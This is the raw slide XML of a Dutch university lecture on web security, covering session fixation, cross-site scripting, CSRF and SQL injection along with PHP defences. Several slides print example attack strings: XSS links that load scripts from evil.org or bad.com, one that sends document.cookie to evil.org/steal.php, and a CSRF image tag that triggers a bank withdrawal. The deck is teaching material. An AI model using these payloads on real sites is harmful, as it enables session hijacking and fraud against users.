              <a:rPr lang="en-US"/>
              <a:t>Vaak zijn dan cookies en dus SIDs te achterhalen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>De SOP kan je ook in de weg zitten!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross-origin resource sharing &amp; document messaging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354746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423020" y="1198312"/>
            <a:ext cx="7272808" cy="590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136626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Niet een SID onderscheppen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Maar er één voeden!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Meestal een server generated SID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Kijk welke SID gegenereerd wordt en stuur die op</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Het makkelijkst via GET query string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Maar bijvoorbeeld ook via te ruime cookies (.example.com), cross-site cooking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Oplossingen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Gebruik cookies voor SID, verander SID bij inloggen of zelfs bij elk request, timeout op SID, controleer: referer URL, IP-adres, user agent (maar),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5068" y="1397819"/>
            <a:ext cx="6192688" cy="663029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/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91420" tIns="35992" rIns="91420" bIns="71985"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+mn-lt"/>
              </a:rPr>
              <a:t>Hé, kijk eens naar de nieuwe Facebook features: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http://www.facebook.com/?SID=1A8E5BA3890D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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" y="2204864"/>
            <a:ext cx="9289032" cy="3139321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if (strpos($_SERVER['HTTP_REFERER'], 'https://trusted/') !== 0 ||</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    isset($_GET['LOGOUT']) || </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    $_SERVER['REMOTE_ADDR'] !== $_SESSION['PREV_REMOTEADDR'] ||</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    $_SERVER['HTTP_USER_AGENT']!== $_SESSION['PREV_USERAGENT']) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  session_destroy(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>}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session_regenerate_id();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$_SESSION['PREV_USERAGENT'] = $_SERVER['HTTP_USER_AGENT'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$_SESSION['PREV_REMOTEADDR'] = $_SERVER['REMOTE_ADDR'];</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9710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6004824" y="1261976"/>
            <a:ext cx="3915140" cy="5839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Cross-site scripting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407519" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Misbruik vertrouwen van een user in een website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Uitvoeren van jouw JavaScript in browser van de user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...dankzij een fout in de vertrouwde website </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload zeer divers, vaak gericht op SID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Diverse soorten XSS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Traditioneel, reflected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Traditioneel, persistent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DOM-based, client side</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basisvorm: traditioneel, reflected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Populair bij zoekresultaten, verwerking credit cards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5092836" y="1175544"/>
            <a:ext cx="4827129" cy="5760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Cross-site scripting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5" y="1295400"/>
            <a:ext cx="9424659" cy="5257800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meeste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de form input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"U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gezocht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> op: ..."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zorgen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ervoor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gebruiker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zoekt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Op basis van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>een</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> door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geprepareerde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> URL...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...die de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gebruiker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> per e-mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ontvangt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>waarin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> we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stukje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>opnemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vervolgens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>geprint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in de HTML context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>De </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aanval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vermomd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betrouwbare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Het </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>probleem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gebrek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input validation!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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enthousiaste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gebruiker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (maar...)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2940" y="1340768"/>
            <a:ext cx="8568952" cy="646331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&lt;a href="http://www.trusted.org/search.php?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  query=&lt;script&gt;alert('XSS')&lt;/script&gt;"&gt;Go to trusted.org&lt;/a&gt;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548" y="2204864"/>
            <a:ext cx="3096345" cy="1241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940" y="2361654"/>
            <a:ext cx="8568952" cy="923330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&lt;a href="http://www.trusted.org/search.php?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  query=&lt;script src='http://www.evil.org/bad.js'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        &lt;/script&gt;"&gt;Go to trusted.org&lt;/a&gt;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940" y="3535848"/>
            <a:ext cx="8568952" cy="1477328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&lt;a href="http://www.trusted.org/search.php?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  query=&lt;script&gt;document.location.replace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>                ('http://www.evil.org/steal.php?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>                  cookie='%2Bdocument.cookie)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        &lt;/script&gt;"&gt;Go to trusted.org&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239679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17140" y="1196752"/>
            <a:ext cx="3748291" cy="5868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Cross-site scripting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208634" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Verschillende encodings vertroebelen de zaak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Oplossingen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Onveilige karakters escapen of verwijderen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Maar: &lt; alleen zinvol indien ook \x3c en %3c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PHP biedt diverse functies ter ondersteuning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Let op: context-afhankelijk; al gauw hairy stuff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Positief valideren; alleen plausibele input accepteren</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Eén onveilige pagina is genoeg...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8964" y="1929606"/>
            <a:ext cx="8568952" cy="923330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&lt;a href="http://www.trusted.org/search.php?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  query=%3cscript%20src=%22http%3a%2f%2fwww.bad.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  %2fnasty.js%22%3e%3c%2fscript%3e"&gt;Go to trusted.org&lt;/a&gt;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3220" y="2996952"/>
            <a:ext cx="6264696" cy="646331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$input_data = htmlspecialchars($input_data);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$input_data = strip_tags($input_data);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72" y="1944035"/>
            <a:ext cx="8424936" cy="3328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11652" y="6309320"/>
            <a:ext cx="2376264" cy="38603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/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91420" tIns="35992" rIns="91420" bIns="71985"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+mn-lt"/>
              </a:rPr>
              <a:t>HTTPOnly cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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27876" y="4039904"/>
            <a:ext cx="360040" cy="1477328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&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/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318528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0" y="1145952"/>
            <a:ext cx="9902825" cy="6601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Cross-site scripting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407519" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Traditional, persistent XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>De JavaScript code wordt opgeslagen op de server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>...en telkens getoond op bepaalde pagina's</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;script&gt;...&lt;/script&gt; in een profiel op een dating site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Geen third party nodig; de gebruiker gaat vrijuit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DOM-based, client side XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Steeds meer client side HTML manipulatie via DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mogelijkheden om daar unescaped data te printen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Document.write van ruwe data uit een request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>80% van de problematiek is XSS (maar…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264644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1736" y="1152128"/>
            <a:ext cx="5741764" cy="5741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Cross-site request forgery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407519" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:srgbClr val="FFCC00"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Misbruik vertrouwen van een website in een user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FFCC00"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tegenovergestelde van XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FFCC00"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gebruiker is ingelogd op vertrouwende site...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FFCC00"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gebruiker heeft een geldig SID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FFCC00"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...maar is ergens anders aan het browsen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FFCC00"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We maken een HTTP request met gewenst effect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="FFCC00"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We zorgen ervoor dat de gebruiker het HTTP request naar de vertrouwende site verstuurt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FFCC00"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Oplossingen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FFCC00"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check referer, hidden token in form, session timeout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FFCC00"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="FFCC00"/>
              </a:buClr>
            </a:pPr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95228" y="5578281"/>
            <a:ext cx="6120680" cy="646331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&lt;img src="http://bank.example.com/withdraw?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>     account=bob&amp;amount=1000000&amp;for=Fred"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369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055"/>
            <a:ext cx="9919964" cy="7424473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7"/>
            <a:ext cx="9902825" cy="765175"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Security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296400" y="6343654"/>
            <a:ext cx="606425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90" indent="-28568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53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54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956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058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157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262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362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fld id="{756AECCE-3931-9A49-BFF7-85E53012F1F2}" type="slidenum">
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="5E574E"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="5E574E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35844" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6119822"/>
            <a:ext cx="9902825" cy="765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b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="4500">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Webtechnologie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35845" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="55566" y="6192839"/>
            <a:ext cx="2287587" cy="69215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l-NL">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Lennart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l-NL">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>Herlaar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35846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5946779"/>
            <a:ext cx="2881312" cy="11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7140" y="2996952"/>
            <a:ext cx="9902825" cy="765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5pPr>
            <a:lvl6pPr marL="457101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6pPr>
            <a:lvl7pPr marL="914204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7pPr>
            <a:lvl8pPr marL="1371303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8pPr>
            <a:lvl9pPr marL="182840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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="482600">
                    <a:srgbClr val="CC0000">
                      <a:alpha val="75000"/>
                    </a:srgbClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Arial Black" charset="0"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3405309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774948" y="1256184"/>
            <a:ext cx="8479804" cy="5653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SQL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5" y="1295400"/>
            <a:ext cx="9407519" cy="5257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/>
              <a:t>Injecteren van SQL code in een bedoelde query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Statische SQL query met dynamische parameters</a:t>
            </a:r>
